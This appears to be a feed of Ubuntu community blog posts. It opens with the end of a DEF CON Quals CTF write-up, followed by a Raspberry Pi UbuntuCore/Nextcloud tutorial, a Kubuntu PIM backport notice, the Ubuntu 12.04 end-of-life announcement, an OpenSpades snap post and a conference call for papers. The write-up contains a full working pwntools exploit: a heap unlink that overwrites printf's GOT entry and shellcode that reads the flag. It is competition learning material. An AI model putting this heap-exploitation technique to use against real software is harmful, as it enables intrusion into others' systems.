Finally, we just need to place some shellcode in one of our blocks. Note that many (all?) of the DEF CON Quals challenges ran in a seccomp sandbox that blocked the ability to use execve, so we’ll have to use an open/read/write shellcode.

Putting it all together (sorry, it’s a bit sloppy, didn’t have time to clean it up yet):

import pwn
from pwnlib.shellcraft import amd64

pwn.context.binary = './beatmeonthedl'

PAD = 'A'*48 + 'B'*8
CHUNK_SIZE = pwn.p64(0)
TARGET_ADDR = 0x609970 # printf@got
TARGET_ADDR_CHUNK = pwn.p64(TARGET_ADDR-24)

proc = None
#proc = pwn.process('./beatmeonthedl')
proc = proc or pwn.remote(
        'beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me',
        6969)

def login():
    proc.recvuntil('username: ')
    proc.sendline('mcfly')
    proc.recvuntil('Pass: ')
    proc.sendline('awesnap')

def menu(n):
    proc.recvuntil('| ')
    proc.sendline(str(n))

pwn.log.info('Login')
login()

pwn.log.info('Create')
for _ in xrange(4):
    menu(1)
    proc.recv()
    proc.sendline('foo')

pwn.log.info('Leak')
menu(3)
proc.recv()
proc.sendline(str(2))
menu(3)
proc.recv()
proc.sendline(str(0))
# alter 1
menu(4)
proc.recv()
proc.sendline(str(1))
proc.recv()
proc.send('Q'*72)
menu(2)
res = proc.recvuntil('3)')
res = res[72+3:-3]
slot_0 = pwn.u64(res+('\0'*(8-len(res))))
print 'Slot 0 probably: {:#08x}'.format(slot_0)

pwn.log.info('Setup chunk')
# reallocate 0
menu(1)
proc.recv()
proc.send('AAAA')

# shellcode in 3
menu(4)
proc.recv()
proc.send(str(3))
proc.recv()
shellcode = '\xeb\x20' + ('\x90'*32)
shellcode += pwn.asm(amd64.cat('flag'))
proc.send(shellcode)

# edit 0 with overwrite
menu(4)
proc.recv()
proc.send(str(0))
proc.recv()
val = (PAD+CHUNK_SIZE+TARGET_ADDR_CHUNK)
target = slot_0+16 + 3*0x40  # target slot 3
print 'Target addr: {:#08x}'.format(target)
val += pwn.p64(target)
proc.send(val)

pwn.log.info('Overwrite')
# trigger free of previous chunk to cause coalescing
menu(3)
proc.recv()
proc.sendline(str(0))

proc.interactive()

pwn.log.info('Exit')
# exit
menu(5)

Oliver Grawert: Use UbuntuCore to create a WiFi AP with nextcloud support on a Pi3 in minutes.


UbuntuCore is the rolling release of Ubuntu.
It is self-updating and completely built out of snap packages (including the kernel, bootloader and root file system), which provides transactional updates, manual and automatic rollback, and a high level of security to all parts of the system.

Once installed you have a secure zero maintenance OS that you can easily turn into a powerful appliance by simply adding a few application snaps to it.

The Raspberry Pi3 comes with WLAN and ethernet hardware on board, which makes it a great candidate to turn into a WiFi access point. But why stop there? With UbuntuCore we can go further and install a WebRTC solution (like spreedme) for making in-house video calls, or a UPnP media server to serve our music and video collections, an OpenHAB home automation device … or we can actually turn it into a personal cloud using the nextcloud snap.

The instructions below walk you through a basic install of UbuntuCore, setting up a WLAN AP, adding an external USB disk to hold data for nextcloud and installing the nextcloud snap.

You need a Raspberry Pi3 and an SD card.

Preparation:

Create an account at https://login.ubuntu.com/ and upload your public ssh key (~/.ssh/id_rsa.pub) in the “SSH Keys” section. This is where your UbuntuCore image will pull the ssh credentials from to provide you login access to the system (by default UbuntuCore does not create a local console login, only remote logins using this ssh key will be allowed).
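
If you do not have a key pair yet, you can generate one and print the public half for pasting into that form:

ogra@pc~$ ssh-keygen -t rsa
ogra@pc~$ cat ~/.ssh/id_rsa.pub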

Download the image from:
http://releases.ubuntu.com/ubuntu-core/16/ubuntu-core-16-pi3.img.xz

…or if you are brave and like to live on the edge you can use a daily build of the edge channel (…bugs included 😉) at:
http://people.canonical.com/~ogra/snappy/all-snaps/daily/current/ubuntu-core-16-pi3.img.xz

Write the image to SD:

Put your SD card into your PC’s SD card reader …
Make sure it did not get auto-mounted (in case it did, do not use the file manager to unmount it, but unmount it from the command line; in the example below my USB card reader shows the SD as /dev/sdb to the system):

ogra@pc~$ mount | grep /dev/sdb # check if anything is mounted
...
ogra@pc~$ sudo umount /dev/sdb1 # unmount the partition
ogra@pc~$ sudo umount /dev/sdb2
ogra@pc~$ 

Use the following command to write the image to the card:

ogra@pc~$ xzcat /path/to/ubuntu-core-16-pi3.img.xz | sudo dd of=/dev/sdb bs=8M
ogra@pc~$ 

Plug the SD into your Pi3, plug in an ethernet cable and either a serial cable or a monitor and keyboard, and power up the board. Eventually you will see a “Please press enter” message on the screen; hitting Enter will start the installer.

Going through the installer …

Configure eth0 as default interface (the WLAN driver is broken in the current pi3 installer. Simply ignore the wlan0 device at this point):

Give your login.ubuntu.com account info so the system can set up your ssh login:

The last screen of the installer will tell you the ssh credentials to use:

Ssh into the board, set a hostname and call sudo reboot (to work around the WLAN breakage):

ogra@pc:~$ ssh ogra@192.168.2.82

...
It's a brave new world here in Snappy Ubuntu Core! This machine
does not use apt-get or deb packages. Please see 'snap --help'
for app installation and transactional updates.

ogra@localhost:~$ sudo hostnamectl set-hostname pi3
ogra@localhost:~$ sudo reboot

Now that we have installed our basic system, we are ready to add some nice application snaps to turn it into a shiny WiFi AP with a personal cloud to use from our phone and desktop systems.

Install and set up your personal WiFi Accesspoint:

ogra@pi3:~$ snap install wifi-ap
ogra@pi3:~$ sudo wifi-ap.setup-wizard
Automatically selected only available wireless network interface wlan0 
Which SSID you want to use for the access point: UbuntuCore 
Do you want to protect your network with a WPA2 password instead of staying open for everyone? (y/n) y 
Please enter the WPA2 passphrase: 1234567890 
Insert the Access Point IP address: 192.168.1.1 
How many host do you want your DHCP pool to hold to? (1-253) 50 
Do you want to enable connection sharing? (y/n) y 
Which network interface you want to use for connection sharing? Available are sit0, eth0: eth0 
Do you want to enable the AP now? (y/n) y 
In order to get the AP correctly enabled you have to restart the backend service:
 $ systemctl restart snap.wifi-ap.backend 
2017/04/29 10:54:56 wifi.address=192.168.1.1 
2017/04/29 10:54:56 wifi.netmask=ffffff00 
2017/04/29 10:54:56 share.disabled=false 
2017/04/29 10:54:56 wifi.ssid=Snappy 
2017/04/29 10:54:56 wifi.security=wpa2 
2017/04/29 10:54:56 wifi.security-passphrase=1234567890 
2017/04/29 10:54:56 disabled=false 
2017/04/29 10:54:56 dhcp.range-start=192.168.1.2 
2017/04/29 10:54:56 dhcp.range-stop=192.168.1.51 
2017/04/29 10:54:56 share.network-interface=eth0 
Configuration applied succesfully 
ogra@pi3:~$

Set up a USB key as a permanently mounted disk:

Plug your USB Disk/Key into the Pi3 and immediately call the dmesg command afterwards so you can see the name of the device and its partitions … (in my case the device name is /dev/sda and there is a vfat partition on the device called /dev/sda1)

Now create /etc/systemd/system/media-usbdisk.mount with the following content (note that systemd requires the unit file name to match the mount point, so media-usbdisk.mount corresponds to /media/usbdisk):

[Unit] 
Description=Mount USB Disk

[Mount]
What=/dev/sda1 
Where=/media/usbdisk 
Options=defaults 

[Install] 
WantedBy=multi-user.target

And enable it:

ogra@pi3:~$ sudo systemctl daemon-reload 
ogra@pi3:~$ sudo systemctl enable media-usbdisk.mount 
ogra@pi3:~$ sudo systemctl start media-usbdisk.mount 
ogra@pi3:~$

Install the nextcloud snap:

ogra@pi3:~$ snap install nextcloud 
ogra@pi3:~$

Allow nextcloud to access devices in /media:

ogra@pi3:~$ snap connect nextcloud:removable-media 
ogra@pi3:~$

Wait a bit; nextcloud’s auto-setup takes a few minutes (make some tea or coffee) …

Turn on https:

ogra@pi3:~$ sudo nextcloud.enable-https self-signed 
Generating key and self-signed certificate... done 
Restarting apache... done 
ogra@pi3:~$

Now you can connect to your new WiFi AP SSID and point your browser to https://192.168.1.1/ afterwards.

Add an exception for the self signed security cert (note that nextcloud.enable-https also accepts Let’s Encrypt certs in case you own one, just call “sudo nextcloud.enable-https -h” to get all info) and configure nextcloud via the web UI.

In the nextcloud UI, install “External Storage Support” from the app section and create a new local Storage pointing to the /media/usbdisk dir so your users can store their files on the external disk.


Kubuntu General News: KDE PIM update now available for Zesty Zapus 17.04


As explained in our call for testing post, we missed by a whisker getting updated PIM 16.12.3 (kontact, kmail, akregator, kgpg etc.) into Zesty for release day, and we believe it is important that our users have access to this significant update.

Therefore packages for the PIM 16.12.3 release are now available in the Kubuntu backports PPAs.

While we believe these packages should be relatively issue-free, please bear in mind that they have not been tested as comprehensively as those in the main ubuntu archive.

Should any issues occur, please provide feedback on our mailing list [1], on IRC [2], by filing a bug against our PPA packages [3], or optionally via social media.

Reading about how to use PPA purge is also advisable.
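
For reference, reverting these backports later would look roughly like this (a sketch; substitute whichever of the two PPAs you added):

sudo apt-get install ppa-purge
sudo ppa-purge ppa:kubuntu-ppa/backports-pim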

How to install KDE PIM 16.12.3 packages for Zesty:

To better serve the varied needs of our users, these updates have been provided in two separate PPAs.

Which of the two you add to your system depends on your preference for receiving further updates of other backported releases of KDE software.

User case 1 – A user who wants to update to PIM 16.12.3, who is happy to add the main backports PPA, and is happy to receive further updates/backports of other applications (plasma, KDE applications, frameworks, digikam, krita etc.) through this backports PPA.

In a console run:

sudo add-apt-repository ppa:kubuntu-ppa/backports

User case 2 – A user who generally wants to use the default Zesty archive packages, but is missing the update to PIM 16.12.3 and would like to add just this.

In a console run:

sudo add-apt-repository ppa:kubuntu-ppa/backports-pim

In both cases, after adding the PPA users should run:

sudo apt-get update
sudo apt-get dist-upgrade

to complete the upgrade.

Notes: It is expected that on most systems the upgrade will ask to remove a few old libraries and obsolete packages. This is normal and required to make way for new versions, and reflects cases where old packages have been split into several new ones in the new KDE PIM release.

Other upgrade methods (Discover/Muon etc) could be used after adding the PPA, but to ensure packages are upgraded and replaced as intended, upgrading via the command line with the above command is the preferred option.

We hope you enjoy the update.

Kubuntu Team.

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net
3. Kubuntu ppa bugs: https://bugs.launchpad.net/kubuntu-ppa

The Fridge: Ubuntu 12.04 (Precise Pangolin) End of Life reached on April 28, 2017


This is a follow-up to the End of Life warning sent last month to confirm that as of today (April 28, 2017), Ubuntu 12.04 is no longer generally supported. No more package updates will be accepted to the 12.04 primary archive, and it will be copied for archival to old-releases.ubuntu.com in the coming weeks.

However, we will again remind you that for customers who can’t upgrade immediately, Canonical is offering Extended Security Maintenance for Ubuntu Advantage customers, more info about which can be found here:

The original End of Life warning follows, with upgrade instructions:

Ubuntu announced its 12.04 (Precise Pangolin) release almost 5 years ago, on April 26, 2012. As with the earlier LTS releases, Ubuntu committed to ongoing security and critical fixes for a period of 5 years. The support period is now nearing its end and Ubuntu 12.04 will reach end of life on Friday, April 28th. At that time, Ubuntu Security Notices will no longer include information or updated packages for Ubuntu 12.04.

The supported upgrade path from Ubuntu 12.04 is via Ubuntu 14.04. Users are encouraged to evaluate and upgrade to our latest 16.04 LTS release via 14.04. Instructions and caveats for the upgrades may be found at https://help.ubuntu.com/community/TrustyUpgrades and https://help.ubuntu.com/community/XenialUpgrades. Ubuntu 14.04 and 16.04 continue to be actively supported with security updates and select high-impact bug fixes. All announcements of official security updates for Ubuntu releases are sent to the ubuntu-security-announce mailing list, information about which may be found at:

https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce
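
For reference, an LTS-to-LTS upgrade is normally started from the command line as follows (back up first, and see the upgrade pages above for caveats):

sudo do-release-upgrade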

For users who can’t upgrade immediately, Canonical has just announced an extended support package for Ubuntu Advantage customers, which will keep delivering security updates while you evaluate your upgrades to newer releases. The announcement, with details about how and where to purchase extended support, can be found at:

https://lists.ubuntu.com/archives/ubuntu-announce/2017-March/000217.html

Since its launch in October 2004 Ubuntu has become one of the most highly regarded Linux distributions with millions of users in homes, schools, businesses and governments around the world. Ubuntu is Open Source software, costs nothing to download, and users are free to customise or alter their software in order to meet their needs.

Originally posted to the ubuntu-announce mailing list on Fri Apr 28 23:22:24 UTC 2017 by Adam Conrad, on behalf of the Ubuntu Release Team

Alan Pope: OpenSpades Snap - pew pew


OpenSpades is a super-fun "Open-Source Voxel First Person Shooter". I've been playing it for a while, both on my GameOS desktop and under WINE on Linux. For whatever reason the upstream OpenSpades project on GitHub had no Linux builds available for download, and I was lazy, so I used WINE, which worked just fine.

This weekend though I decided to fix that. So I made a snap of it and pushed it to the store. If you're on a Linux distro which supports snaps you can install it with one command:-

snap install openspades

That will install the current stable release of openspades - 0.1.1c. If you'd rather test the latest github master build (as of yesterday) then use:-

snap install openspades --edge

Note: OpenSpades needs a fairly decent video card. My poor Thinkpad T450 with its integrated Intel GPU isn't up to the job, so the game switches to software rendering. However on my more beefy nVidia-powered desktop, it uses the GPU for OpenGL funky stuff.

OpenSpades on Ubuntu

I tested this build on Ubuntu 16.04, Debian 9, elementary OS Loki, Lubuntu (i386), Fedora 25 and OpenSUSE Tumbleweed. One snap(*), lots of distros. Yeah baby! :D

OpenSpades on OpenSUSE Tumbleweed

OpenSpades on Fedora 25

OpenSpades on Debian 9

(*) Technically four snaps. One per arch (32/64-bit) and one per release (stable/edge).

I proposed my changes upstream to the OpenSpades project.

I used Launchpad to build the binaries for stable and edge on both i386 and amd64 architectures, for free. Thanks Canonical!

I had to do a couple of interesting things to make OpenSpades work nicely across all these systems. I bundled in a few libraries, and wrapped the launching of the game in a script which sets up some environment variables. I just copy and pasted that part from other projects I've done in the past.
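
The post doesn't include the wrapper itself, but such launcher scripts usually look something like this sketch; the variable values are illustrative and the published snap's may differ:

#!/bin/sh
# Hypothetical launcher sketch: point the dynamic loader and Mesa at the
# bundled libraries, then hand off to the game. $SNAP is set by the snap runtime.
export LD_LIBRARY_PATH="$SNAP/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH"
export LIBGL_DRIVERS_PATH="$SNAP/usr/lib/x86_64-linux-gnu/dri"
exec "$SNAP/usr/bin/openspades" "$@"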

The only slightly kludgy thing I did was copy the Resources directory into a writable directory and modify the default configuration for first-launch. OpenSpades has an 'update check' feature which looks for game updates online, but it seems to me this doesn't work on Linux - probably due to there being no binary builds currently available. So rather than the user getting prompted to enable this feature, I enabled it by default, so the user just gets a notification that they're on the latest version, rather than being asked to enable a feature that won't work anyway. With snaps the user will get an update as soon as it's pushed to the store, so no need for the in-app update mechanism I think.

I also had to disable EAX (positional audio) because it crashes OpenAL on the i386 builds. Players on AMD64 systems can of course just re-enable this, as it's only the default I set, not permanently off. I might modify this default so it's only disabled on i386 builds in future.

So if you're in need of something fun to play on your Linux system. Give OpenSpades a try, and let me know if you get any problems with the snap!

Pew pew!

Jono Bacon: Open Community Conference CFP Closes This Week


This coming weekend is the Community Leadership Summit in Austin (I hope to see you all there!), but there is another event I am running which you need to know about.

The Open Community Conference is one of the four main events that is part of the Open Source Summit in Los Angeles from 11th – 13th September 2017. A little while ago the Linux Foundation and I started exploring running a new conference as part of their Open Source Summit, and this has culminated in the Open Community Conference.

The goals of the event are simple: to provide presentations, panels, and networking that share community management and leadership best practice in a practical and applicable way. My main goal is to provide a set of speakers who have built great communities, either internally or externally, and have them share their insights.

This is different to the Community Leadership Summit: CLS is a set of discussions designed for community managers. The Open Community Conference is a traditional conference with presentations, panels, and more, in which methods, approaches, case studies, and other material are shared, and it is designed for a broader audience.

Call For Papers

If you have built community in the open source world, or have built internal communities using open source methodologies, I would love to have you submit a paper by clicking here. The call for papers closes THIS WEEK on 6th May 2017, so get them in!

The post Open Community Conference CFP Closes This Week appeared first on Jono Bacon.
